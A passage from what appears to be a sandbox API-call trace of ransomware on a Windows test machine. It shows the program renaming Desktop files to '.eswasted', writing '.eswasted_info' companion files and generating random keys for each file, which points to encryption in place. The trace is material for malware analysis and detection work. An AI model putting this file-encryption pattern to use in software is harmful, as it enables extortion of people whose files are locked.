"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jhqz.mp4.eswasted")) returned 1 [0072.462] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JhQZ.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jhqz.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.462] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0072.463] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x19ad [0072.463] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x19ad) returned 0x2d0000 [0072.463] CloseHandle (hObject=0xfc) returned 1 [0072.464] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.465] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.465] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.465] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.466] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.466] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.474] SetEndOfFile (hFile=0x100) returned 1 [0072.476] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.476] CloseHandle (hObject=0x100) returned 1 [0072.477] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0072.477] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ee5e8 | out: hHeap=0x4a0000) returned 1 [0072.478] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0072.478] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0072.478] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.478] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JynX.csv") returned 50 [0072.478] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x26e) returned 0x4e1ab8 [0072.478] lstrcpyW (in: lpString1=0x4e1b1c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.478] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0072.479] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0072.479] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0072.479] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JynX.csv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jynx.csv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.480] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.481] SetEndOfFile (hFile=0x100) returned 1 [0072.481] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.481] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.481] lstrcpyW (in: lpString1=0x4e1b1c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JynX.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jynx.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JynX.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jynx.csv.eswasted")) returned 1 [0072.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JynX.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jynx.csv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.482] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0072.483] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x4887 [0072.483] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4887) returned 0x2d0000 [0072.483] CloseHandle (hObject=0xf8) returned 1 [0072.485] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.485] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.485] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.485] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.486] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.486] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.501] SetEndOfFile (hFile=0x100) returned 1 [0072.536] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.536] CloseHandle (hObject=0x100) returned 1 [0072.538] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0072.538] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ee6a8 | out: hHeap=0x4a0000) returned 1 [0072.538] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0072.539] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0072.539] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.539] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Leg-KPBup_6U.gif") returned 58 [0072.539] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27e) returned 0x4e1ab8 [0072.539] lstrcpyW (in: lpString1=0x4e1b2c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.539] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.539] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0072.539] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.540] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Leg-KPBup_6U.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\leg-kpbup_6u.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.540] WriteFile (in: hFile=0x100, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.541] SetEndOfFile (hFile=0x100) returned 1 [0072.542] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.542] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.542] lstrcpyW (in: lpString1=0x4e1b2c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.542] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Leg-KPBup_6U.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\leg-kpbup_6u.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Leg-KPBup_6U.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\leg-kpbup_6u.gif.eswasted")) returned 1 [0072.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Leg-KPBup_6U.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\leg-kpbup_6u.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.543] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0072.543] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x1068e [0072.543] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1068e) returned 0xb10000 [0072.543] CloseHandle (hObject=0xfc) returned 1 [0072.547] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.548] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0072.548] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.548] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.548] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.548] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.557] SetEndOfFile (hFile=0x100) returned 1 [0072.559] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.559] CloseHandle (hObject=0x100) returned 1 [0072.560] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0072.560] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ee908 | out: hHeap=0x4a0000) returned 1 [0072.560] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0072.561] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0072.561] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.561] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NgETknRA.png") returned 54 [0072.561] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x276) returned 0x4e1ab8 [0072.561] lstrcpyW (in: lpString1=0x4e1b24, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.561] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.561] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0072.562] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.562] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.562] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NgETknRA.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngetknra.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.573] WriteFile (in: hFile=0x100, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.574] SetEndOfFile (hFile=0x100) returned 1 [0072.574] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.574] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.574] lstrcpyW (in: lpString1=0x4e1b24, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.574] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NgETknRA.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngetknra.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NgETknRA.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngetknra.png.eswasted")) returned 1 [0072.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NgETknRA.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ngetknra.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.574] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0072.575] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x2bf8 [0072.575] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2bf8) returned 0x2d0000 [0072.575] CloseHandle (hObject=0xf8) returned 1 [0072.577] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.577] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.577] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.577] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.578] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.578] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.586] SetEndOfFile (hFile=0x100) returned 1 [0072.588] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.588] CloseHandle (hObject=0x100) returned 1 [0072.590] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0072.590] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dec60 | out: hHeap=0x4a0000) returned 1 [0072.590] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0072.591] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0072.591] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.591] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ouuvdgsrJ.pdf") returned 55 [0072.591] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x278) returned 0x4e1ab8 [0072.591] lstrcpyW (in: lpString1=0x4e1b26, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.591] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.591] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0072.591] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.591] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ouuvdgsrJ.pdf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ouuvdgsrj.pdf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.592] WriteFile (in: hFile=0x100, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.593] SetEndOfFile (hFile=0x100) returned 1 [0072.593] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.593] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.593] lstrcpyW (in: lpString1=0x4e1b26, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.593] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ouuvdgsrJ.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ouuvdgsrj.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ouuvdgsrJ.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ouuvdgsrj.pdf.eswasted")) returned 1 [0072.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ouuvdgsrJ.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ouuvdgsrj.pdf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.594] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0072.594] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x1216f [0072.594] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1216f) returned 0xb10000 [0072.594] CloseHandle (hObject=0xfc) returned 1 [0072.598] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.599] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.599] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.599] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.599] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.599] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.607] SetEndOfFile (hFile=0x100) returned 1 [0072.610] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.610] CloseHandle (hObject=0x100) returned 1 [0072.611] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0072.611] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ded28 | out: hHeap=0x4a0000) returned 1 [0072.611] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0072.612] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0072.612] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.612] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p pGMcYNdVFSCT9ttOI.mp3") returned 65 [0072.612] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28c) returned 0x4e1ab8 [0072.612] lstrcpyW (in: lpString1=0x4e1b3a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.612] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.612] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0072.613] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.613] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p pGMcYNdVFSCT9ttOI.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p pgmcyndvfsct9ttoi.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.615] WriteFile (in: hFile=0x100, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.616] SetEndOfFile (hFile=0x100) returned 1 [0072.617] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.617] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.617] lstrcpyW (in: lpString1=0x4e1b3a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.617] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p pGMcYNdVFSCT9ttOI.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p pgmcyndvfsct9ttoi.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p pGMcYNdVFSCT9ttOI.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p pgmcyndvfsct9ttoi.mp3.eswasted")) returned 1 [0072.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p pGMcYNdVFSCT9ttOI.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p pgmcyndvfsct9ttoi.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.617] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0072.617] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xcac2 [0072.618] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcac2) returned 0x2d0000 [0072.618] CloseHandle (hObject=0xf8) returned 1 [0072.621] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.622] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 